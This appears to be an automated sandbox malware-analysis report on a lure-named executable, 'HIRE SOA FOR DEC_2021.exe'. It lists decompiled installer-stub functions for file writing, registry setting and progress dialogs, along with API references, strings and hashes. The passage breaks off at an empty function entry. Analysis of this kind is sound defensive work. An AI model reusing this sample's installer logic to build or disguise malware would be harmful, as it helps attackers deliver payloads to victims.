Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

CloseHandle.KERNEL32(00000000,?,00000000,00000001,00000001,?,00000000,?,?,00405568,?,00000000,000000F1,?), ref: 00405820
GetShortPathNameA.KERNEL32(?,00422628,00000400), ref: 00405829
GetShortPathNameA.KERNEL32(00000000,004220A0,00000400), ref: 00405846
wsprintfA.USER32 ref: 00405864
GetFileSize.KERNEL32(00000000,00000000,004220A0,C0000000,00000004,004220A0,?,?,?,00000000,000000F1,?), ref: 0040589F
GlobalAlloc.KERNEL32(00000040,0000000A,?,?,00000000,000000F1,?), ref: 004058AE
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,00000000,000000F1,?), ref: 004058C4
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,?,00421CA0,00000000,-0000000A,00409348,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040590A
WriteFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,000000F1,?), ref: 0040591C
GlobalFree.KERNEL32 ref: 00405923
CloseHandle.KERNEL32(00000000,?,?,00000000,000000F1,?), ref: 0040592A

Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 004056D8
Part of subcall function 004056D1: lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,004058DF,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405708

Strings

[Rename], xrefs: 004058D4, 004058E6
(&B, xrefs: 0040580E
%s=%s, xrefs: 0040585A

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: File$Handle$CloseGlobalNamePathShortlstrlen$AddressAllocFreeLibraryLoadModulePointerProcReadSizeWritewsprintf
String ID: %s=%s$(&B$[Rename]
API String ID: 3772915668-1834469719
Opcode ID: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction ID: f113039d6a8e0b98787bbcb52898fefdd985450d1919188b96c4478b1d7dfea3
Opcode Fuzzy Hash: 59f55a9dc5d97f07b1302869ed359d77eb01a2f99cc6c2b796ec22a8fd90dab3
Instruction Fuzzy Hash: 0F412371A00B11FBD3216B619D48FAB3A5CDB45764F100036FA05F22D2E678A801CEBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405CE3 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405CE3(CHAR* _a4) {
				char _t5;
				char _t7;
				char* _t15;
				char* _t16;
				CHAR* _t17;

				_t17 = _a4;
				if( *_t17 == 0x5c && _t17[1] == 0x5c && _t17[2] == 0x3f && _t17[3] == 0x5c) {
					_t17 =  &(_t17[4]);
				}
				if( *_t17 != 0 && E004055E5(_t17) != 0) {
					_t17 =  &(_t17[2]);
				}
				_t5 =  *_t17;
				_t15 = _t17;
				_t16 = _t17;
				if(_t5 != 0) {
					do {
						if(_t5 > 0x1f &&  *((char*)(E004055A3("*?|<>/\":", _t5))) == 0) {
							E0040571D(_t16, _t17, CharNextA(_t17) - _t17);
							_t16 = CharNextA(_t16);
						}
						_t17 = CharNextA(_t17);
						_t5 =  *_t17;
					} while (_t5 != 0);
				}
				 *_t16 =  *_t16 & 0x00000000;
				while(1) {
					_t16 = CharPrevA(_t15, _t16);
					_t7 =  *_t16;
					if(_t7 != 0x20 && _t7 != 0x5c) {
						break;
					}
					 *_t16 =  *_t16 & 0x00000000;
					if(_t15 < _t16) {
						continue;
					}
					break;
				}
				return _t7;
			}

0x00405ce5
0x00405ced
0x00405d01
0x00405d01
0x00405d07
0x00405d14
0x00405d14
0x00405d15
0x00405d17
0x00405d1b
0x00405d1d
0x00405d26
0x00405d28
0x00405d42
0x00405d4a
0x00405d4a
0x00405d4f
0x00405d51
0x00405d53
0x00405d57
0x00405d58
0x00405d5b
0x00405d63
0x00405d65
0x00405d69
0x00000000
0x00000000
0x00405d6f
0x00405d74
0x00000000
0x00000000
0x00000000
0x00405d74
0x00405d79

APIs

CharNextA.USER32(?,*?|<>/":,00000000,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D3B
CharNextA.USER32(?,?,?,00000000), ref: 00405D48
CharNextA.USER32(?,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D4D
CharPrevA.USER32(?,?,"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" ,C:\Users\user\AppData\Local\Temp\,00000000,004031FD,C:\Users\user\AppData\Local\Temp\,00000000,0040336F), ref: 00405D5D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405CE4, 00405D1F
"C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" , xrefs: 00405CE9
*?|<>/":, xrefs: 00405D2B

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Char$Next$Prev
String ID: "C:\Users\user\Desktop\HIRE SOA FOR DEC_2021.exe" $*?|<>/":$C:\Users\user\AppData\Local\Temp\
API String ID: 589700163-2957946372
Opcode ID: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction ID: 2efc38d3d3d4567a91e012bcb7a73cc210910fb997772161a70c169f721ad970
Opcode Fuzzy Hash: 7ea15337aa65b78854fdfbf4a976c6e6ace2ef0f47433067a0fc10695a03ac80
Instruction Fuzzy Hash: 5811E251804B9129EB3226285C48B7B6F89CF97760F18807BE5C1722C2D67C5C429E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00403E9E Relevance: 12.1, APIs: 8, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403E9E(intOrPtr _a4, struct HDC__* _a8, struct HWND__* _a12) {
				struct tagLOGBRUSH _v16;
				long _t35;
				long _t37;
				void* _t40;
				long* _t49;

				if(_a4 + 0xfffffecd > 5) {
					L15:
					return 0;
				}
				_t49 = GetWindowLongA(_a12, 0xffffffeb);
				if(_t49 == 0) {
					goto L15;
				}
				_t35 =  *_t49;
				if((_t49[5] & 0x00000002) != 0) {
					_t35 = GetSysColor(_t35);
				}
				if((_t49[5] & 0x00000001) != 0) {
					SetTextColor(_a8, _t35);
				}
				SetBkMode(_a8, _t49[4]);
				_t37 = _t49[1];
				_v16.lbColor = _t37;
				if((_t49[5] & 0x00000008) != 0) {
					_t37 = GetSysColor(_t37);
					_v16.lbColor = _t37;
				}
				if((_t49[5] & 0x00000004) != 0) {
					SetBkColor(_a8, _t37);
				}
				if((_t49[5] & 0x00000010) != 0) {
					_v16.lbStyle = _t49[2];
					_t40 = _t49[3];
					if(_t40 != 0) {
						DeleteObject(_t40);
					}
					_t49[3] = CreateBrushIndirect( &_v16);
				}
				return _t49[3];
			}

0x00403eb0
0x00403f44
0x00000000
0x00403f44
0x00403ec1
0x00403ec5
0x00000000
0x00000000
0x00403ecb
0x00403ed4
0x00403ed7
0x00403ed7
0x00403edd
0x00403ee3
0x00403ee3
0x00403eef
0x00403ef5
0x00403efc
0x00403eff
0x00403f02
0x00403f04
0x00403f04
0x00403f0c
0x00403f12
0x00403f12
0x00403f1c
0x00403f21
0x00403f24
0x00403f29
0x00403f2c
0x00403f2c
0x00403f3c
0x00403f3c
0x00000000

APIs

GetWindowLongA.USER32 ref: 00403EBB
GetSysColor.USER32(00000000), ref: 00403ED7
SetTextColor.GDI32(?,00000000), ref: 00403EE3
SetBkMode.GDI32(?,?), ref: 00403EEF
GetSysColor.USER32(?), ref: 00403F02
SetBkColor.GDI32(?,?), ref: 00403F12
DeleteObject.GDI32(?), ref: 00403F2C
CreateBrushIndirect.GDI32(?), ref: 00403F36

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction ID: 00f1469000c5a89127aeec98ef40b5380c975c6b17ce5fce2ee989e1a8c22914
Opcode Fuzzy Hash: 54c4c26d0880f537c7164b4e2121e342b47f232b14c6c2566c024284623f766e
Instruction Fuzzy Hash: D9216271904745ABCB219F68DD08B5BBFF8AF01715B048A69F895E22E1C738E9048B55

Uniqueness

Uniqueness Score: -1.00%

Function 0040266E Relevance: 10.6, APIs: 7, Instructions: 89
memoryfileCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E0040266E(struct _OVERLAPPED* __ebx) {
				void* _t27;
				long _t32;
				struct _OVERLAPPED* _t47;
				void* _t51;
				void* _t53;
				void* _t56;
				void* _t57;
				void* _t58;

				_t47 = __ebx;
				 *(_t58 - 8) = 0xfffffd66;
				_t52 = E004029E8(0xfffffff0);
				 *(_t58 - 0x44) = _t24;
				if(E004055E5(_t52) == 0) {
					E004029E8(0xffffffed);
				}
				E0040573D(_t52);
				_t27 = E0040575C(_t52, 0x40000000, 2);
				 *(_t58 + 8) = _t27;
				if(_t27 != 0xffffffff) {
					_t32 =  *0x423eb4;
					 *(_t58 - 0x2c) = _t32;
					_t51 = GlobalAlloc(0x40, _t32);
					if(_t51 != _t47) {
						E004031DA(_t47);
						E004031A8(_t51,  *(_t58 - 0x2c));
						_t56 = GlobalAlloc(0x40,  *(_t58 - 0x1c));
						 *(_t58 - 0x30) = _t56;
						if(_t56 != _t47) {
							E00402F01(_t49,  *((intOrPtr*)(_t58 - 0x20)), _t47, _t56,  *(_t58 - 0x1c));
							while( *_t56 != _t47) {
								_t49 =  *_t56;
								_t57 = _t56 + 8;
								 *(_t58 - 0x38) =  *_t56;
								E0040571D( *((intOrPtr*)(_t56 + 4)) + _t51, _t57, _t49);
								_t56 = _t57 +  *(_t58 - 0x38);
							}
							GlobalFree( *(_t58 - 0x30));
						}
						WriteFile( *(_t58 + 8), _t51,  *(_t58 - 0x2c), _t58 - 8, _t47);
						GlobalFree(_t51);
						 *(_t58 - 8) = E00402F01(_t49, 0xffffffff,  *(_t58 + 8), _t47, _t47);
					}
					CloseHandle( *(_t58 + 8));
				}
				_t53 = 0xfffffff3;
				if( *(_t58 - 8) < _t47) {
					_t53 = 0xffffffef;
					DeleteFileA( *(_t58 - 0x44));
					 *((intOrPtr*)(_t58 - 4)) = 1;
				}
				_push(_t53);
				E00401423();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t58 - 4));
				return 0;
			}

0x0040266e
0x00402670
0x0040267c
0x0040267f
0x00402689
0x0040268d
0x0040268d
0x00402693
0x004026a0
0x004026a8
0x004026ab
0x004026b1
0x004026bf
0x004026c4
0x004026c8
0x004026cb
0x004026d4
0x004026e0
0x004026e4
0x004026e7
0x004026f1
0x00402710
0x004026f8
0x004026fd
0x00402705
0x00402708
0x0040270d
0x0040270d
0x00402717
0x00402717
0x00402729
0x00402730
0x00402742
0x00402742
0x00402748
0x00402748
0x00402753
0x00402754
0x00402758
0x0040275c
0x00402762
0x00402762
0x00402769
0x00402156
0x00402880
0x0040288c

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 004026C2
GlobalAlloc.KERNEL32(00000040,?,00000000,?,?,?,?,000000F0), ref: 004026DE
GlobalFree.KERNEL32 ref: 00402717
WriteFile.KERNEL32(FFFFFD66,00000000,?,FFFFFD66,?,?,?,?,000000F0), ref: 00402729
GlobalFree.KERNEL32 ref: 00402730
CloseHandle.KERNEL32(FFFFFD66,?,?,000000F0), ref: 00402748
DeleteFileA.KERNEL32(?,00000000,40000000,00000002,00000000,00000000,?,?,000000F0), ref: 0040275C

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID:
API String ID: 3294113728-0
Opcode ID: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction ID: 9ca9f948efa3d3b3c01768b84b42719a88da944e93008125b7d5b0dd1b363230
Opcode Fuzzy Hash: 4c0fd2d05d9642674c9ab6b4876f57fc245776767d9f13474b3403e8ff6ab1b0
Instruction Fuzzy Hash: 5B318D71C00128BBDF216FA9CD89D9E7E79EF09364F10422AF910772E0D7795D419BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00404E23 Relevance: 10.6, APIs: 7, Instructions: 73
stringwindowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E23(CHAR* _a4, CHAR* _a8) {
				struct HWND__* _v8;
				signed int _v12;
				CHAR* _v32;
				long _v44;
				int _v48;
				void* _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t26;
				signed int _t27;
				CHAR* _t28;
				long _t29;
				signed int _t39;

				_t26 =  *0x423684;
				_v8 = _t26;
				if(_t26 != 0) {
					_t27 =  *0x423f54;
					_v12 = _t27;
					_t39 = _t27 & 0x00000001;
					if(_t39 == 0) {
						E00405AA7(0, _t39, 0x41fc70, 0x41fc70, _a4);
					}
					_t26 = lstrlenA(0x41fc70);
					_a4 = _t26;
					if(_a8 == 0) {
						L6:
						if((_v12 & 0x00000004) == 0) {
							_t26 = SetWindowTextA( *0x423668, 0x41fc70);
						}
						if((_v12 & 0x00000002) == 0) {
							_v32 = 0x41fc70;
							_v52 = 1;
							_t29 = SendMessageA(_v8, 0x1004, 0, 0);
							_v44 = 0;
							_v48 = _t29 - _t39;
							SendMessageA(_v8, 0x1007 - _t39, 0,  &_v52);
							_t26 = SendMessageA(_v8, 0x1013, _v48, 0);
						}
						if(_t39 != 0) {
							_t28 = _a4;
							 *((char*)(_t28 + 0x41fc70)) = 0;
							return _t28;
						}
					} else {
						_t26 =  &(_a4[lstrlenA(_a8)]);
						if(_t26 < 0x800) {
							_t26 = lstrcatA(0x41fc70, _a8);
							goto L6;
						}
					}
				}
				return _t26;
			}

0x00404e29
0x00404e35
0x00404e38
0x00404e3e
0x00404e4a
0x00404e4d
0x00404e50
0x00404e56
0x00404e56
0x00404e5c
0x00404e64
0x00404e67
0x00404e84
0x00404e88
0x00404e91
0x00404e91
0x00404e9b
0x00404ea4
0x00404eb0
0x00404eb7
0x00404ebb
0x00404ebe
0x00404ed1
0x00404edf
0x00404edf
0x00404ee3
0x00404ee5
0x00404ee8
0x00000000
0x00404ee8
0x00404e69
0x00404e71
0x00404e79
0x00404e7f
0x00000000
0x00404e7f
0x00404e79
0x00404e67
0x00404ef2

APIs

lstrlenA.KERNEL32(0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000,?), ref: 00404E5C
lstrlenA.KERNEL32(00402C3C,0041FC70,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C3C,00000000), ref: 00404E6C
lstrcatA.KERNEL32(0041FC70,00402C3C,00402C3C,0041FC70,00000000,00000000,00000000), ref: 00404E7F
SetWindowTextA.USER32(0041FC70,0041FC70), ref: 00404E91
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404EB7
SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404ED1
SendMessageA.USER32(?,00001013,?,00000000), ref: 00404EDF

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: MessageSend$lstrlen$TextWindowlstrcat
String ID:
API String ID: 2531174081-0
Opcode ID: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction ID: 451019a1d205659c79ebfdec41688bb46c1145c2f0803241f2332644a3b6c24c
Opcode Fuzzy Hash: 6af7de6fb12d37621311d767828a5214a6e37c73fc4d498048a22c56ae339c00
Instruction Fuzzy Hash: 12217C71A00118BBCB119FA5DD809DFBFB9FB44354F00807AF904A6290C7394E45CF98

Uniqueness

Uniqueness Score: -1.00%

Function 004046F2 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004046F2(struct HWND__* _a4, intOrPtr _a8) {
				long _v8;
				signed char _v12;
				unsigned int _v16;
				void* _v20;
				intOrPtr _v24;
				long _v56;
				void* _v60;
				long _t15;
				unsigned int _t19;
				signed int _t25;
				struct HWND__* _t28;

				_t28 = _a4;
				_t15 = SendMessageA(_t28, 0x110a, 9, 0);
				if(_a8 == 0) {
					L4:
					_v56 = _t15;
					_v60 = 4;
					SendMessageA(_t28, 0x110c, 0,  &_v60);
					return _v24;
				}
				_t19 = GetMessagePos();
				_v16 = _t19 >> 0x10;
				_v20 = _t19;
				ScreenToClient(_t28,  &_v20);
				_t25 = SendMessageA(_t28, 0x1111, 0,  &_v20);
				if((_v12 & 0x00000066) != 0) {
					_t15 = _v8;
					goto L4;
				}
				return _t25 | 0xffffffff;
			}

0x00404700
0x0040470d
0x00404713
0x00404751
0x00404751
0x00404760
0x00404767
0x00000000
0x00404769
0x00404715
0x00404724
0x0040472c
0x0040472f
0x00404741
0x00404747
0x0040474e
0x00000000
0x0040474e
0x00000000

APIs

SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 0040470D
GetMessagePos.USER32 ref: 00404715
ScreenToClient.USER32 ref: 0040472F
SendMessageA.USER32(?,00001111,00000000,?), ref: 00404741
SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404767

Strings

f, xrefs: 00404743

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction ID: 77fe7446b7d437ffed3a300e181f1a5f8136abba45dafe536ab26234a61f9ca7
Opcode Fuzzy Hash: 2a5698d5089c35727aab5c3c5da7bcfb0b51a0b1d2cb1bbeaafe9db8233e3477
Instruction Fuzzy Hash: 74014071D00219BADB01DBA4DD45BFEBBB8AB55711F10012ABA10B71C0D7B4A5018B95

Uniqueness

Uniqueness Score: -1.00%

Function 00402B2D Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36
timeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00402B2D(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				void* _t11;
				CHAR* _t19;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t11 = E00402BA9();
					_t19 = "unpacking data: %d%%";
					if( *0x423eb0 == 0) {
						_t19 = "verifying installer: %d%%";
					}
					wsprintfA( &_v68, _t19, _t11);
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}

0x00402b3a
0x00402b48
0x00402b4e
0x00402b4e
0x00402b5c
0x00402b5e
0x00402b6a
0x00402b6f
0x00402b71
0x00402b71
0x00402b7c
0x00402b8c
0x00402b9e
0x00402b9e
0x00402ba6

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B48
wsprintfA.USER32 ref: 00402B7C
SetWindowTextA.USER32(?,?), ref: 00402B8C
SetDlgItemTextA.USER32 ref: 00402B9E

Strings

unpacking data: %d%%, xrefs: 00402B6A, 00402B7A
verifying installer: %d%%, xrefs: 00402B71

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction ID: 63589245c82b20a35a818b51aea08eb627593e3ecb5db54badb7bc3d6c1792f2
Opcode Fuzzy Hash: e04cdd19e0c63b62eaa7e8eced31868a1262f8adf0a2f46f7645d1242f1aea5d
Instruction Fuzzy Hash: F3F01D70900209ABEF215F50DD0ABAA3779BB04345F00803AFA06A91D1D7B9AA569B99

Uniqueness

Uniqueness Score: -1.00%

Function 004022F5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71
registrystringCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E004022F5(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402ADD(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x14));
				 *(_t37 - 0x30) =  *(_t37 - 0x10);
				 *(_t37 - 0x44) = E004029E8(2);
				_t18 = E004029E8(0x11);
				_t31 =  *0x423f50 | 0x00000002;
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423f50 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E004029E8(0x23);
						_t19 = lstrlenA(0x40a368) + 1;
					}
					if(_t35 == 4) {
						_t24 = E004029CB(3);
						 *0x40a368 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402F01(_t31,  *((intOrPtr*)(_t37 - 0x18)), _t27, 0x40a368, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x44), _t27,  *(_t37 - 0x30), 0x40a368, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423f28 =  *0x423f28 +  *(_t37 - 4);
				return 0;
			}

0x004022f6
0x004022fb
0x00402305
0x0040230f
0x00402312
0x00402322
0x0040232c
0x00402333
0x0040233b
0x00402349
0x0040234d
0x00402358
0x00402358
0x0040235c
0x00402360
0x00402366
0x0040236b
0x0040236b
0x0040236f
0x0040237b
0x0040237b
0x00402394
0x00402396
0x00402396
0x00402399
0x0040246f
0x0040246f
0x00402880
0x0040288c

APIs

RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402333
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nslEC79.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402353
RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nslEC79.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040238C
RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nslEC79.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 0040246F

Strings

C:\Users\user\AppData\Local\Temp\nslEC79.tmp, xrefs: 00402344, 00402366, 00402376, 00402381

Memory Dump Source

Source File: 00000001.00000002.668508565.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.668481780.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668520972.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668550767.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668568709.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668600244.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.668605245.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_HIRE SOA FOR DEC_2021.jbxd

Similarity

API ID: CloseCreateValuelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nslEC79.tmp
API String ID: 1356686001-1137806273
Opcode ID: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction ID: c0f72d529a206c1f33eb9b8d59e365bb4fe54d10a3d93e78d78dba992e985e14
Opcode Fuzzy Hash: 652f9a8a3f1dc98aeeeb98f906d59e2320e136a87a08436aae013fd7976f2720
Instruction Fuzzy Hash: 0F1175B1E00118BFEB10AFA1DE4AEAF767CEB04758F10443AF505B71D0D6B99D019A69

Uniqueness

Uniqueness Score: -1.00%

Function 00402BC5 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 48
COMMON

Download Yara Rule

C-Code - Quality: 100%

